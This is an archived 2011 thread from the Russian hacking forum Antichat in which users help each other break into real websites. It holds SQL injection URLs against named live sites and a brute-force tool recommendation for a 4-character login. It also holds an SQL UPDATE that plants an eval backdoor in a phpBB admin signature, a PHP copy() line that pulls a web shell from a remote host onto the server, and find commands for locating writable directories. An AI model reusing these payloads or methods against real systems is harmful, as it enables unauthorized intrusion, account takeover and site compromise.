ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.11.2011, 03:19
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от None
http://la2-shop.ru/categories.php?id_cat=2'
в этом параметре инъекции нет. зато есть в другом:
http://la2-shop.ru/categories.php?id_msg=2'+union+select+1,2,3--+
вывод в тайтле.
|
|
|
08.11.2011, 03:20
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954
Репутация:
32
|
|
Сообщение от d1v
d1v said:
http://la2.war-top.ru/index.php?do=sitedetails&id=186' or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -
а дальше сам.
хинт: error based.
Спасибо огромное! ++
|
|
|
|
08.11.2011, 03:35
|
|
Постоянный
Регистрация: 14.09.2005
Сообщений: 415
Провел на форуме:
1052005
Репутация:
131
|
|
тема такая есть веб форма логин пас капчи нету пробил вручную нету все нормально пас из 4х символов другими словами можно сбрутить легко акаунт , вопрос каким софтом ето можно сделать? что актуальное посоветуете ...
|
|
|
|
08.11.2011, 03:36
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
Ребят мне как сделать так что бы шелл залился нормальный человеческий я имею доступ к админке пхпбб форум
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;
че тут поменять и на что ? что бы был шелл всо??? ненадо умничать)
|
|
|
|
08.11.2011, 03:38
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от теща
теща said:
тема такая есть веб форма логин пас капчи нету пробил вручную нету все нормально пас из 4х символов другими словами можно сбрутить легко акаунт , вопрос каким софтом ето можно сделать? что актуальное посоветуете ...
BrutusA2
|
|
|
|
08.11.2011, 04:03
|
|
Постоянный
Регистрация: 14.09.2005
Сообщений: 415
Провел на форуме:
1052005
Репутация:
131
|
|
Сообщение от Strilo4ka
Strilo4ka said:
BrutusA2
скачал AET2
сайт начинается с https://тутпоставилИПсайта вставил в форму программы сделал пасы и логин , но чет не работает так как надо , капчи нету , что не так ?
поставил на перебор на TYPE HTTP (Form)
что не так сделал ?
там нету протокола https
|
|
|
|
08.11.2011, 04:14
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756
Репутация:
0
|
|
Сообщение от d1v
d1v said:
в этом параметре инъекции нет.
Ты помоему спешишь куда-то постоянно
В этом тоже есть:
http://la2-shop.ru/categories.php?id_cat=-3'+union+select+version()--+
Сообщение от Strilo4ka
Strilo4ka said:
Зачем $_GET юзаете? =/
Другой масив используйте, или накрайняк $_REQUEST уж так надо $_GET оставить.
А можно узнать зачем использовать $_REQUEST если " уж так надо $_GET оставить" ? )
Или это какой то приватный метод, онли закрытые группы?
satana8920: из-за кавычек ошибки не будет. У тебя там stripslashes стоит для этого.
phpinfo вообще выводит? И что там стоит в урлфайлопен, если да
|
|
|
|
08.11.2011, 04:27
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
Сообщение от KolosJey
KolosJey said:
Ты помоему спешишь куда-то постоянно
В этом тоже есть:
http://la2-shop.ru/categories.php?id_cat=-3'+union+select+version()--+
А можно узнать зачем использовать $_REQUEST если " уж так надо $_GET оставить" ? )
Или это какой то приватный метод, онли закрытые группы?
satana8920
: из-за кавычек ошибки не будет. У тебя там stripslashes стоит для этого.
phpinfo вообще выводит? И что там стоит в урлфайлопен, если да
пхпинфо вывод отлично allow_url_fopen On стоит блин ребят дайте код рабочий для заливки шелла плс
|
|
|
|
08.11.2011, 04:33
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756
Репутация:
0
|
|
copy('http://сайт с шеллом/shell.txt','./путь/на сервере/в папку с правами на запись/shell.php');
|
|
|
|
08.11.2011, 04:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от KolosJey
KolosJey said:
copy('http://сайт с шеллом/shell.txt','./путь/на сервере/в папку с правами на запись/shell.php');
Copy() будет ограничена при safe_mode=on.
Лучше move_uploaded_file().
С командной строки можна найти так найти вритабельные директории\файлы(файлы дописать!):
find . -type d -perm 777 -print
find . -type f -perm 777 –print
Если системную команду не выполнить в php есть функция = is_writable(), через нее можна поискать вритабельные.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для DJ ][akep](/avatars/avatar48987.jpg?2891664){kind=avatar}
Похожие темы
Линейный вид
